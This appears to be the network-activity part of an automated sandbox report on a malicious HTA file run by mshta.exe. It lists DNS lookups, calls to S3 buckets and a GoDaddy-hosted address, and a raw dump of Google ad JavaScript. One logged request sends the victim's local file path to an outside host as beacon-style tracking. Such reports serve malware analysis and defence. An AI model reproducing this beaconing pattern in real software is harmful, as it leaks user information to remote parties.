                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.575890064 CET192.168.2.228.8.8.80x3119Standard query (0)logs-referer.s3-sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.593514919 CET192.168.2.228.8.8.80x686dStandard query (0)s3-sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:07.555042982 CET192.168.2.228.8.8.80x6247Standard query (0)102.57.205.92.host.secureserver.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:07.824666023 CET192.168.2.228.8.8.80x6247Standard query (0)102.57.205.92.host.secureserver.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.196494102 CET192.168.2.228.8.8.80x6247Standard query (0)102.57.205.92.host.secureserver.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 23, 2024 10:26:51.974093914 CET8.8.8.8192.168.2.220x2ccNo error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:26:51.974093914 CET8.8.8.8192.168.2.220x2ccNo error (0)static.nl3.vip.prod.criteo.net178.250.1.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.213135004 CET8.8.8.8192.168.2.220x8e49No error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.213135004 CET8.8.8.8192.168.2.220x8e49No error (0)static.nl3.vip.prod.criteo.net178.250.1.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.257040977 CET8.8.8.8192.168.2.220x7aa8No error (0)images-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.325113058 CET8.8.8.8192.168.2.220x513No error (0)securepubads.g.doubleclick.net142.250.181.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.373645067 CET8.8.8.8192.168.2.220x45f7No error (0)statics-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.391196966 CET8.8.8.8192.168.2.220x7aa8No error (0)images-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.577708006 CET8.8.8.8192.168.2.220x513No error (0)securepubads.g.doubleclick.net142.250.181.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.783530951 CET8.8.8.8192.168.2.220x45f7No error (0)statics-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.881392002 CET8.8.8.8192.168.2.220xb78bNo error (0)www.americanas.com.brsni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:15.087064028 CET8.8.8.8192.168.2.220xb78bNo error (0)www.americanas.com.brsni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:36.374963045 CET8.8.8.8192.168.2.220x17f0No error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:36.374963045 CET8.8.8.8192.168.2.220x17f0No error (0)static.nl3.vip.prod.criteo.net178.250.1.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET8.8.8.8192.168.2.220x3119No error (0)logs-referer.s3-sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET8.8.8.8192.168.2.220x3119No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.234.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET8.8.8.8192.168.2.220x3119No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET8.8.8.8192.168.2.220x3119No error (0)s3-r-w.sa-east-1.amazonaws.com52.95.164.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET8.8.8.8192.168.2.220x3119No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET8.8.8.8192.168.2.220x3119No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET8.8.8.8192.168.2.220x3119No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.0.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET8.8.8.8192.168.2.220x3119No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.0.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET8.8.8.8192.168.2.220x3119No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.234.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846709967 CET8.8.8.8192.168.2.220x686dNo error (0)s3-sa-east-1.amazonaws.com16.12.2.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846709967 CET8.8.8.8192.168.2.220x686dNo error (0)s3-sa-east-1.amazonaws.com52.95.163.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846709967 CET8.8.8.8192.168.2.220x686dNo error (0)s3-sa-east-1.amazonaws.com3.5.233.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846709967 CET8.8.8.8192.168.2.220x686dNo error (0)s3-sa-east-1.amazonaws.com3.5.234.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846709967 CET8.8.8.8192.168.2.220x686dNo error (0)s3-sa-east-1.amazonaws.com16.12.0.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846709967 CET8.8.8.8192.168.2.220x686dNo error (0)s3-sa-east-1.amazonaws.com16.12.0.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846709967 CET8.8.8.8192.168.2.220x686dNo error (0)s3-sa-east-1.amazonaws.com3.5.232.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846709967 CET8.8.8.8192.168.2.220x686dNo error (0)s3-sa-east-1.amazonaws.com3.5.234.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:07.824431896 CET8.8.8.8192.168.2.220x6247No error (0)102.57.205.92.host.secureserver.net92.205.57.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.092567921 CET8.8.8.8192.168.2.220x6247No error (0)102.57.205.92.host.secureserver.net92.205.57.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.330168962 CET8.8.8.8192.168.2.220x6247No error (0)102.57.205.92.host.secureserver.net92.205.57.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  • securepubads.g.doubleclick.net
                                                                                                                                                                                                                                  • s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                                  • logs-referer.s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                                  • 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  0192.168.2.2249168142.250.181.1304433520C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-23 09:27:16 UTC354OUTGET /tag/js/gpt.js HTTP/1.1
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                  Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 09:27:16 GMT
                                                                                                                                                                                                                                  Expires: Mon, 23 Dec 2024 09:27:16 GMT
                                                                                                                                                                                                                                  Cache-Control: private, max-age=900, stale-while-revalidate=3600
                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                  ETag: 550 / 20080 / m202412090101 / config-hash: 16775640167977932469
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                  Server: cafe
                                                                                                                                                                                                                                  Content-Length: 105873
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC603INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 73 74 74 63 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 29 7b 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 28 29 3b 7d 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 5f 6c 6f 61 64 65 64 5f 29 72 65 74 75 72 6e 3b 76 61 72 20 6e 2c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 2c 62 61 3d 74 79 70 65
                                                                                                                                                                                                                                  Data Ascii: (function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=type
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC1390INData Raw: 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 2c 64 61 3d 63 61 28 74 68 69 73 29 2c 65 61 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 28 22 78 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 2c 74 3d 7b 7d 2c 66 61 3d 7b 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 63 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 63 3d 66 61 5b 62 5d 3b 69 66 28 63 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 63 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 61 5b 62 5d 7d 7d 2c 77 3d 66 75 6e
                                                                                                                                                                                                                                  Data Ascii: &&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},u=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=fun
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC1390INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 61 28 61 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 75 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 2c 69 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 6a 61 3b 69
                                                                                                                                                                                                                                  Data Ascii: :function(){return ha(aa(this))}})}return a},"es6");var ha=function(a){a={next:a};a[u(t.Symbol,"iterator")]=function(){return this};return a},ia=typeof Object.create=="function"?Object.create:function(a){var b=function(){};b.prototype=a;return new b},ja;i
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC1390INData Raw: 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 31 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 64 29 66 6f 72 28 76 61 72 20 65 20 69 6e 20 64 29 71 61 28 64 2c 65 29 26 26 28 61 5b 65 5d 3d 64 5b 65 5d 29 7d 72 65 74 75 72 6e 20 61 7d 3b 77 28 22 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 73 61 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 74 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                                  Data Ascii: on(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)qa(d,e)&&(a[e]=d[e])}return a};w("Object.assign",function(a){return a||sa},"es6");var ta=function(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC1390INData Raw: 2e 67 29 3f 64 65 6c 65 74 65 20 67 5b 64 5d 5b 74 68 69 73 2e 67 5d 3a 21 31 7d 3b 72 65 74 75 72 6e 20 66 7d 2c 22 65 73 36 22 29 3b 77 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 75 28 61 2e 70 72 6f 74 6f 74 79 70 65 2c 22 65 6e 74 72 69 65 73 22 29 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 7a 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c
                                                                                                                                                                                                                                  Data Ascii: .g)?delete g[d][this.g]:!1};return f},"es6");w("Map",function(a){if(function(){if(!a||typeof a!="function"||!u(a.prototype,"entries")||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(z([[h,"s"]]));if(k.get(h)!="s"||k.size!=1||
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC1390INData Raw: 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 6b 65 79 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 76 61 6c 75 65 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 75 28 74 68 69 73 2c 22 65 6e 74 72 69 65 73 22 29 2e 63 61 6c 6c 28 74 68 69 73 29 2c 70 3b 21 28 70 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 70 3d 70 2e 76 61 6c 75 65 2c 68 2e 63 61 6c 6c 28 6b 2c 70 5b 31 5d 2c 70 5b 30 5d 2c 74 68 69 73 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                  Data Ascii: turn e(this,function(h){return h.key})};c.prototype.values=function(){return e(this,function(h){return h.value})};c.prototype.forEach=function(h,k){for(var l=u(this,"entries").call(this),p;!(p=l.next()).done;)p=p.value,h.call(k,p[1],p[0],this)};c.prototyp
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC1390INData Raw: 29 2e 64 6f 6e 65 3b 29 74 68 69 73 2e 61 64 64 28 64 2e 76 61 6c 75 65 29 7d 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 63 3d 3d 3d 30 3f 30 3a 63 3b 74 68 69 73 2e 67 2e 73 65 74 28 63 2c 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 74 68 69 73 2e 67 2e 64 65 6c 65 74 65 28 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 63 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73
                                                                                                                                                                                                                                  Data Ascii: ).done;)this.add(d.value)}this.size=this.g.size};b.prototype.add=function(c){c=c===0?0:c;this.g.set(c,c);this.size=this.g.size;return this};b.prototype.delete=function(c){c=this.g.delete(c);this.size=this.g.size;return c};b.prototype.clear=function(){this
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC1390INData Raw: 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 77 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 75 61 28 74 68 69 73 2c 62 2c 22 69 6e 63 6c 75 64 65 73 22 29 2e 69 6e 64 65 78 4f 66 28 62 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 2c 22 65 73 36 22 29 3b 77 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66
                                                                                                                                                                                                                                  Data Ascii: ular expression");return a+""};w("String.prototype.includes",function(a){return a?a:function(b,c){return ua(this,b,"includes").indexOf(b,c||0)!==-1}},"es6");w("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],f
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC1390INData Raw: 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 67 3e 3d 66 7d 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 76 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 2b 3d 22 22 29 3b 76 61 72 20 63 3d 30 2c 64 3d 21 31 2c 65 3d 7b 6e 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 64 26 26 63 3c 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 66 3d 63 2b 2b 3b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 62 28 66 2c 61 5b 66 5d 29 2c 64 6f 6e 65 3a 21 31 7d 7d 64 3d 21 30 3b 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 7d 3b 65 5b 75 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72
                                                                                                                                                                                                                                  Data Ascii: turn!1;return g>=f}},"es6");var va=function(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:function(){if(!d&&c<a.length){var f=c++;return{value:b(f,a[f]),done:!1}}d=!0;return{done:!0,value:void 0}}};e[u(t.Symbol,"iterator")]=function(){return e};r
                                                                                                                                                                                                                                  2024-12-23 09:27:17 UTC1390INData Raw: 7b 76 61 72 20 63 3d 77 61 28 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 29 3b 61 3d 63 26 26 63 5b 61 5d 3b 72 65 74 75 72 6e 20 61 21 3d 6e 75 6c 6c 3f 61 3a 62 7d 2c 77 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 42 2c 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 62 3d 62 5b 61 5b 63 5d 5d 2c 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 7d 2c 79 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 61 3b 72 65 74 75 72 6e 20 62 21 3d 22 6f 62 6a 65 63 74 22 3f 62 3a 61 3f 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 22 61 72 72 61 79 22 3a 62 3a 22 6e 75 6c 6c 22 7d 2c 7a 61 3d 66 75 6e
                                                                                                                                                                                                                                  Data Ascii: {var c=wa("CLOSURE_FLAGS");a=c&&c[a];return a!=null?a:b},wa=function(a){a=a.split(".");for(var b=B,c=0;c<a.length;c++)if(b=b[a[c]],b==null)return null;return b},ya=function(a){var b=typeof a;return b!="object"?b:a?Array.isArray(a)?"array":b:"null"},za=fun


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  1192.168.2.224921416.12.2.604433520C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-23 09:28:00 UTC474OUTGET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                  Host: s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2024-12-23 09:28:01 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  x-amz-id-2: ce93CVcQRGaXIBw1fowhxwpX8m/X1xWFvykVYkRt/uhcftRc0vSZv164dNdMvpiL1jPOw6bSx0o=
                                                                                                                                                                                                                                  x-amz-request-id: EYAK3KWA1K2FYM8E
                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 09:28:01 GMT
                                                                                                                                                                                                                                  Last-Modified: Thu, 04 May 2017 08:21:21 GMT
                                                                                                                                                                                                                                  ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                  x-amz-meta-s3cmd-attrs: uid:502/gname:staff/uname:user/gid:20/mode:33188/mtime:1493416832/atime:1493796970/md5:d41d8cd98f00b204e9800998ecf8427e/ctime:1493416832
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  2192.168.2.22492133.5.234.554433520C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-23 09:28:00 UTC377OUTGET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                  Host: logs-referer.s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2024-12-23 09:28:01 UTC396INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  x-amz-id-2: qs4hylEplpJ035LKECqwfpxdLkAgVLfyVkKfgQByfktkC4lHY6v/R+PN2nKZ84uieBzOMfMg4A6zzdtCZ+iXZw/wNX0fjOu8
